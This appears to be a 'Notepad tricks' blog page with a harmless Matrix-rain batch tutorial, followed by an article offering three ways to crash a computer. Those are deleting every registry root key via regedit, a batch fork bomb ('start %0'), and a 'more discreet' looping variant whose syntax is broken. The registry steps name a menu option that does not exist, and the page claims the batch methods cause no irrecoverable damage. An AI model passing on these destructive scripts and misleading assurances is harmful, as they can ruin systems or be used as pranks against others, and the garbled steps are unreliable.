Categories
Notepad Tricks

How To Create The Matrix Rain In Command Prompt

Everybody loves the visual effect of the falling binary code known as ” Rain ” in The Matrix. In this article, we gonna show you an easy way to create The Matrix rain in your Command Prompt.

Steps To Create A Matrix Rain In Command Prompt

Step 1: Open Notepad.

Step 2: Copy and paste the below code in your notepad

How To Create The Matrix Rain In Command Prompt , How To Create The Matrix Rain In Command Prompt

@echo off
 color 02
 :start
 echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%.
 goto start

Step 3: Click on ” File ” and then ” Save As ” option. Save your file with a ” .bat ” extension i.e ” OnlineCmag.bat “.

How To Create The Matrix Rain In Command Prompt , How To Create The Matrix Rain In Command Prompt

Step 4: Run that batch file as an administrator.

How To Create The Matrix Rain In Command Prompt , How To Create The Matrix Rain In Command Prompt

How To Create Your Own Computer Clock Using Notepad

Today we are going to show you an interesting notepad trick which lets you create your own computer clock with date and time. You can customize the PC clock

Read More

To enlarge The Screen

Step 5: Right-click on the command prompt and Click on the properties.

Step 6: Click on the Layout tab.

How To Create The Matrix Rain In Command Prompt , How To Create The Matrix Rain In Command Prompt

Step 7: Click On the window size section and enter your required resolution.

Step 8: To apply changes Click on ok.

Ghost keyboard Typing | Make Your Notepad type Automatically

Today we are going to show you a Cool Notepad Trick ( Prank ) ever. Mostly people use their notepad to type and save the information, Ghost keyboard Typing

Read More

To Stop The Matrix Rain:

How To Create The Matrix Rain In Command Prompt , How To Create The Matrix Rain In Command Prompt

Just press CTRL + C, Then you will be asked: ” whether to terminate the job “. Now type ” y ” to stop the program.

Tips :

You can even add colors to your command prompt background and text. This is just by changing color codes i.e if you use  “color A2” or “color 2A” then you will have a light green text on a green background.You may use any combination between 0 to 9 and A to F to change your background and Text colors.

Easy Way To Create A Memory Eating Virus – Just For The Fun Of It

We are going to teach you the easiest way of creating a virus. In this process to create a virus that eats up the computer memory i.e Memory Eating virus

Read More

To See All The Articles On Notepad Tricks Click Here. We Are Sure You Will Be Amazed.

Categories
Notepad Tricks PC Hacks

Here Are Top 3 Ways To Crash A Computer

For whatever may be the reason, if you want to crash your computer then you are at the right place. In this article, we will be discussing three top ways to crash a computer.

In my opinion, the best practice to crash a computer is by using a batch file. This is particularly because it will not harm or cause any irrecoverable damage to your computer like the remaining methods.

Go take utmost care and do write us your experiences at the end of the article.

How To Create A Simple Animation Using Notepad

We are going to show you a very interesting notepad trick to make your own animations. Follow the steps below to create a simple animation of a bouncing ball

Read More

Steps To Crash A Computer

Method 1

Step 1: Go To Start Menu.

Step 2: Click On Run.

Step 3: Type ” Regedit ” in the run dialog box.

How to Crash a Computer using batch file

Step 4: Click OK. Now you will be taken to a registry editor.

Step 5: Under the ” My computer ” option you will find the following folders:

How to Crash a Computer using batch file

HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG

These are called the registry root keys and you can learn more about them here.

Step 6: Open all the above-mentioned folders.

Step 7: Click on ” Delete all the registries “.

How to Crash a Computer using batch file

Step 8: Restart your System.

Ever Tried To Remotely Shutdown Your PC? Here’s How To

In this article we gonna show you ” how to use the remote shutdown command ” in Windows . Which is used to remotely shutdown, logoff or restart a local PC or

Read More

Method 2

Step 1: Open the Notepad and paste the code given below.

crash a computer using batch file

start %0
%0

Step 2: Save the file with ” .bat ” extension and file type to all.

crash a computer using batch file

Step 3: Run the ” OnlineCmag.bat ” file to crash your computer.

Step 4: Finished.

Method 3 

This method is quite similar to the above one, but it does not open any programs or windows, making it much more discreet.

Step 1: Copy and paste the below code into a Notepad.

crash a computer using batch file

@echo off
A
start
goto A

Step 2: Save it as a batch file with ” .bat ” extension. That’s It.

Important Tips:

=>You should log into the computer as an administrator.
=>If you want to recover your PC,  Then just start your computer in a safe mode.

If you observe your computer crashing with or without your intervention, you can always have the crash reports using this tool.

If You Have Tried Any Of These Methods Do Share With Us Your Experiences In Form Of Comments …